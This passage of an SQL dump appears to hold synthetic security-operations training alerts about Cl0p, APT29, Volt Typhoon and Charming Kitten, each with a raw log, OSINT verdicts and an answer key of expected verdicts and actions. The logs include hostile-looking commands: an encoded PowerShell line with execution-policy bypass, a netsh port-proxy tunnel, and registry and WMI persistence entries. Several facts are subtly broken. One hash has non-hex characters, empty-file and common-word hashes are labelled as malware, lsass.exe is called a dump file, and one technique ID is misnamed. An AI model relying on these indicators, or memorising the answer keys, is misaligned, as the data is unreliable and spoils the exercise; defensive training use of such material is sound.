Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor installation scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script executed post-phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (430, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'Cl0p has been observed modifying registry keys to ensure their backdoor persists through system reboots. This technique is used to maintain a foothold in the system and evade basic detection.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:22:35Z\",\"event_id\":4657,\"user\":\"administrator\",\"computer_name\":\"WIN-12AB34CD56\",\"registry_key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malicious.exe\\\"\",\"source_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Threat Database\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used by Cl0p group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (431, 'Credential Dumping in Progress', 'critical', 'Security Information and Event Management (SIEM)', 'With persistence established, Cl0p begins dumping credentials from memory, preparing to infiltrate additional systems within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"process_name\":\"lsass.exe\",\"dump_file\":\"C:\\\\Windows\\\\Temp\\\\dumplog.dmp\",\"hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"event_type\":\"Credential Dumping\",\"message\":\"Credential dumping detected from memory using lsass.exe.\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High privilege user account targeted\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"File used for storing dumped credentials\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Expert', 'NULL', 1, 0, NULL), (432, 'Data Exfiltration via Encrypted Channel', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, Cl0p utilized encrypted channels to exfiltrate sensitive data from the network, leveraging legitimate file transfer protocols such as SFTP to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:30:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.100.87.200\",\"protocol\":\"SFTP\",\"file_name\":\"financial_report_2023.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"encryption\":\"AES256\",\"bytes_transferred\":5242880,\"connection_duration\":360}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Identified as a command-and-control server associated with Cl0p.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known stolen data set.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (433, 'Suspicious Login Attempts Detected', 'high', 'SIEM', 'Initial access is attempted through a series of password spraying attacks targeting cloud accounts of diplomatic personnel.', 'Password Spraying', 'T1110.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"event_source\":\"cloud.service\",\"event_type\":\"login_attempt\",\"user\":\"diplomat_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"success\":false,\"attempt_count\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\",\"attack_pattern\":\"Password Spraying\",\"associated_hash\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"malicious\":true}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 password spraying campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted cloud account.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"diplomat_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"clean\",\"details\":\"Valid diplomatic personnel cloud account.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (434, 'Unusual Token Usage Pattern', 'high', 'Cloud Access Security Broker (CASB)', 'Anomalous token usage detected following a successful password spraying attack. Stolen tokens were used to bypass MFA, indicating potential privilege escalation attempts.', 'Token Theft', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_source\":\"CASB\",\"event_type\":\"Token Usage\",\"user\":\"jdoe@corporate.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.10.5\",\"token_id\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"file_accessed\":\"/secure/finance_reports/q3_2023.pdf\",\"token_status\":\"anomalous\",\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"context\":\"Token used to access privileged resources without MFA verification\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corporate.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous token usage tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (435, 'Creation of Unauthorized OAuth Applications', 'high', 'Cloud Application Logs', 'An unauthorized OAuth application was created, indicating potential abuse for persistent access to cloud email systems.', 'OAuth Abuse', 'T1550.001 - OAuth Abuse', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"oauth-creation-5678\",\"action\":\"create_oauth_app\",\"user\":\"compromised_user@example.com\",\"application_name\":\"RogueApp\",\"application_id\":\"app-123456789\",\"client_id\":\"client-98765\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"username\":\"compromised_user@example.com\"}}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known OAuth abuse campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (436, 'Lateral Movement Detected in Cloud Environment', 'high', 'Network Traffic Analysis', 'A lateral movement within the cloud infrastructure was detected. The attacker, leveraging existing access, targeted additional diplomatic cloud accounts. Indicators of compromise involved suspicious internal IP communications and unauthorized access from a known malicious IP.', 'Cloud Exploitation', 'T1550.004 - Cloud Instance Metadata API', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:45:32Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.5.23\",\"external_ip\":\"203.0.113.45\",\"user\":\"diplomatic_user_x\",\"action\":\"login_attempt\",\"status\":\"success\",\"hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"filename\":\"malicious_script.sh\",\"description\":\"Detected lateral movement from internal IP 192.168.1.102 to 10.0.5.23 with successful login using diplomatic_user_x. External IP 203.0.113.45 has known malicious activity associated with APT29.\",\"indicator_type\":\"Cloud Exploitation\",\"notable_tool\":\"OAuth Abuse\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT29 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP involved in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"diplomatic_user_x\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (437, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) System', 'In the final stage of the operation, attackers attempted to exfiltrate sensitive diplomatic communications and data. The DLP system detected unusual data transfer activities originating from an internal host to an external IP address associated with known malicious activity.', 'Data Exfiltration', 'T1002: Data Compressed', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"file_transferred\":\"diplomatic_communications.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-20231015-001\",\"description\":\"Unusual data transfer detected to external IP\",\"malware_association\":\"APT29\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"diplomatic_communications.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive diplomatic communications\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 exfiltration tactics\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User within the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (438, 'Unusual PowerShell Execution Detected', 'high', 'SIEM logs', 'Volt Typhoon initiates their campaign by executing obfuscated PowerShell scripts to avoid detection and gather preliminary system information.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":4688,\"host\":{\"hostname\":\"workstation-23\",\"internal_ip\":\"10.0.5.23\",\"os\":\"Windows 10\"},\"user\":{\"username\":\"jdoe\",\"domain\":\"CORP\",\"user_id\":\"S-1-5-21-123456789-123456789-123456789-1001\"},\"process\":{\"pid\":4567,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\"},\"network\":{\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.15\",\"destination_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"recon.ps1\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\recon.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}}', '2026-01-04 23:57:09', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Volt Typhoon\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as part of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution for user profile\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (439, 'Suspicious WMI Activity Spotted', 'high', 'Endpoint detection and response (EDR) alerts', 'The attackers leverage WMI to create persistent footholds, enabling them to execute scripts remotely whenever the system restarts. Detected WMI subscription creation on host with persistent script execution capabilities.', 'Persistence', 'T1084', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:32:45Z\",\"event_id\":\"4624\",\"host_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"wmi_class\":\"ActiveScriptEventConsumer\",\"wmi_filter\":\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_Process\'\",\"wmi_consumer\":\"malicious_script.js\",\"hash\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"description\":\"WMI subscription detected for persistent access\",\"process\":\"wmiprvse.exe\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used in APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Script used in attacks for remote execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_account_audit\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (440, 'Anomalous netsh Configuration Changes', 'high', 'Network traffic analysis', 'Detected suspicious netsh configuration changes potentially used for creating tunnels across the network. This activity is consistent with lateral movement tactics employed by the Volt Typhoon APT group.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_type\":\"network\",\"source_ip\":\"10.0.3.45\",\"destination_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"netsh interface portproxy add v4tov4 listenport=3389 listenaddress=10.0.3.45 connectport=3389 connectaddress=192.168.1.100\",\"process_name\":\"netsh.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"netsh.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP used in suspicious netsh command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by netsh command.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Volt Typhoon activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Known hash for netsh.exe, legitimate system utility.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL), (441, 'Unexpected Remote Desktop Protocol (RDP) Sessions', 'high', 'RDP logs', 'An unauthorized remote session was detected from an external IP address, indicating a potential lateral movement attempt. The session accessed a high-value system within the network, suggesting an advanced attempt to expand network foothold.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:53Z\",\"event_id\":\"4624\",\"logon_type\":10,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"logon_guid\":\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\",\"transmitted_services\":\"-\",\"lm_package_name\":\"NTLM\",\"key_length\":128}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks in the past.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal high-value server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected use of account during non-business hours.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (442, 'Stealthy Data Exfiltration via Encrypted Channels', 'critical', 'Data loss prevention (DLP) systems', 'In the final stage, Volt Typhoon exfiltrates gathered intelligence through encrypted channels, ensuring the data leaves the network unnoticed.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"event_id\":\"EXP-2023-10-15-0001\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"203.0.113.45\",\"encryption_protocol\":\"TLSv1.3\",\"destination_port\":443,\"data_size\":\"5GB\",\"user\":\"jdoe\",\"file_hash\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"filename\":\"confidential_data.zip\",\"process\":\"exfiltrator.exe\",\"internal_network\":\"192.168.1.0/24\",\"external_domain\":\"malicious-exfiltration.com\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Volt Typhoon.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential exfiltration of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malicious exfiltration activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (443, 'Phishing Email Detected', 'medium', 'Email Security Gateway', 'A phishing email was detected posing as an interview request. The email was sent from a known malicious IP address linked to Charming Kitten APT group, attempting to entice the target to engage.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:55:32Z\",\"email_id\":\"785e6a2f-1b7a-4f3c-bd8f-5d8f560f1f83\",\"from\":\"hr@fakecompany.com\",\"to\":\"targetuser@victimcompany.com\",\"subject\":\"Interview Request\",\"attacker_ip\":\"185.92.26.82\",\"recipient_ip\":\"192.168.1.15\",\"malicious_link\":\"http://malicious-link.com/interview\",\"attachment_name\":\"Interview_Schedule.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', 